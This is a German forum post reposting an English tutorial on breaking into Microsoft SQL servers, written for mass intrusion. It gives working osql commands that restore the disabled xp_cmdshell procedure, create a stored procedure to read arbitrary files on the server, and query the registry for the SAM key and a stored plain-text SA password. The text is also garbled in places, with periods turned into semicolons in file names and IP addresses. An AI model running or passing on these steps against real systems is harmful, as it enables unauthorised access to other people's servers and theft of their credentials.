Vollständige Version anzeigen : [Hacking] How 2 Fixx SQL Errors

06.01.2008, 17:00

Hab ich mal im Netz gefunden. Ist zwar auf Englisch, aber sicher für den ein oder anderen hilfreich :)


0) Index
1) Tools Needed
2) The Easiest Way
3) Restoring xp_cmdshell
4) Reading almost any file on server
5) Reading The Registry
7) Final Words

0) Index

This tutorial is intended as a guide to hack the secured sql servers. Conentrating on the well
known SQL_ERROR respons.
This means:

- Hack sql servers that has only got a normmal user pass
- Hack sql servers where the stored proceduure xp_cmdshell has been disabled

This DOESN'T mean:

- Hack sql servers where the ;dll has been changed or switched with another one.
- Explaining how to bruteforce sql server aaccounts

Hope this tutorials is ofany use to those who want hack more things or just want to know things.
Plz ***** about this tut if things don't work but don't start bitching that it is to slow
to hack more then 10 machines a day.

I also want to thank Swiv for his time to answer my question and to his portion of contribution to this

1) Tools Needed

- A server with port 1433 open and the corrrect username/password
- osql;exe
- sqlexec;exe written by sunx (the 1 with tthat has the green apple as icon)

ALSO keep in mind that all of the given commands only work if they are enabled else it will fail
2) The Easiest Way

First of all make shure you use the correct sqlexec version and not "sqlexec for nethacker 1;0"
So use sqlexec;exe that has a green apple als icon.
When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1;0" hasn't got
that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways
of sending the data to the sql server.

The options:

1 xp_cmdshell"%s"
2 select * from openrowset etc
3 create procedure #proc_temp etc
4 %s

Option 1 is the same as in "sqlexec for nethacker 1;0" So when "sqlexec for nethacker 1;0" gives a
SQL_ERROR this app wil do also BUT when selecting option 2 most of the time you will be able to hack
the server in normal way.
3) Restoring xp_cmdshell

Restoring xp_cmdshell seems like difficult task but in fact it is easy.
first of all this only works when the stored procedure xp_cmdshell is dropt if the ;dll has been changed
then it won't work.
Tis is only intended when the easy way doesn't work but most of the time it does.

Put the following in a ;txt(example: restore;txt) and save it in te same directory as osql;exe is

use master /
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70;dll'/
go /

The above path depends on the installation of MSSQL so it can be different under some circumstances.
when done execute osql;exe like this:

osql;exe -S 123;123;123;123 -U sa -P "" -i restore;txt

Now if everything went how it is supposed to go, the xp_cmdshell is enabled again and you can use option
1 from sqlexec or the other app to hack the machine.

If you want to view all stored procedure on the server currently in youre power execute osql like:

osql;exe -S 123;123;123;123 -U sa -P "" -Q "sp_stored_procedures"

Keep in mind that this also has got procedures made by a admin and maybe hasn't got the standard ones.
4) Reading almost any file on server

I say any because sometimes when the file is to big it refuses to read it. It also refuses to read when
the file is in use.
First of all check if the file is on the server before attempting to read it for that execute osql like:

osql;exe -S 123;123;123;123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net;exe'"

If the file exists it will give back some numbers meaning filesize,date etc.

When teh respond was a positive repost put the following in a ;txt(example: read;txt) and make shure it
is in the same folder as osql;exe

Create proc sp_readTextFile ;filename sysname /
as /
begin /
set nocount on /
Create table #tempfile (line varchar(8000)) /
exec ('bulk insert #tempfile from "' + ;filename + '"')/
select * from #tempfile /
drop table #tempfile /
End /
go /

when done execute osql;exe like this:

osql;exe -S 123;123;123;123 -U sa -P "" -i read;txt

You have now succesfully created a stored procedure to read files;Now how doyou read files with it?
Very simple use osql;exe like this:

osql;exe -S 123;123;123;123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile;txt

Then just browse to youre local C: and there you will find the file;Only problem is there will be a lot
of wite stripes and "-" character that is the normal sql output way I can't do anything about that.
5) Reading The Registry

Reading the registry cna be handy when there is valuable information stored into it like passwords or
I'll give a little example on how to read the sam file just take 1 note even if you read the sam file on
a win2k machine it is useless because of the standard security it has. Explanation on what you can do
with registry reading will be explained later.

Fire up osql;exe and execute it like this:

osql;exe -S 123;123;123;123 -U sa -P "" -Q "USE master EXEC xp_regread ‘HKEY_LOCAL_MACHINE’, ‘SECURITY\SAM\Domains\Account’, ‘F’"

and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6;5

the password of the SA user is stored in plain text could be handy if you hack a machine that has sql
running and the hack has got no super user rights like IISMEDIA exploit. then just grab the sql pass
from the registry.
6) Final Words

Hope this has been of some help I can give NO garantee everything in here will work under different
circumstances. But all citics are welcome.
Further I have spend some time investigating all this and trying to explain it in a simple as possible way
so I say again don't ***** if this ain't good enough for mass-hacking.

For the rest keep learning and finding out things peeps.

Hacking is something you gotta feel.
Don't be lame, don't be lazy try thinigs yourself it really pays back.
1 final note:
I did not give scenario's and solutions on purpose I hope that with he info that is in this paper
you all will have enough imagination to hack something with it. Maybe later on I will make a scenario
and solutions paper about this.




Hardware Preisvergleich | Amazon Blitzangebote!

Videos zum Thema
Video Loading...
Ähnliche Themen zu [Hacking] How 2 Fixx SQL Errors
  • Windows System Errors
    hiho, schalt mal den nachrichten dienst ab mfg halloweenracer // immer diese user, die zur gleichen zeit nen post machen müssen^^^^ :D [...]

  • [PHP] errors in log datei schreiben
    Hiho, ich bin bei einem hoster, wo ich die error;log nicht einsehen kann und wollte nun meinem Script sagen, das es die errors in eine von mir angelegte datei schreiben soll. Auf die PHP;ini kann ich leider nicht zugreifen. Im internet habe ich gelesen, das es hiermit funktionieren soll: <?php [...]

  • Memtest 4 Errors!
    Hi leute also ich habe ein großes Problem und zwar ich spiele ab und zu mit meinem System MotoGP07 und so und auf einmal friert mein rechner ein ... Sprich da geht gar nix mehr seh nur noch mein Bild und das wars,also da hilft nur ein reboot Haben dann einfach mal nen Memtest drüber laufen lassen [...]

  • FritzBox Errors
    Hi! Hab mal ein Screenshot gemacht von den Fehlern und Errors, die die FritzBox ausgibt bei mir. Hab das Gefühl da stimmt was mit der Leitung nicht. Kann mir jemand von euch sagen, was die Errors zu bedeuten haben? Ich glaube das is nicht normal, z;B. der Forward Error Correction-Wert ?( Bild=dow [...]

raid-rush.ws | Imprint & Contact pr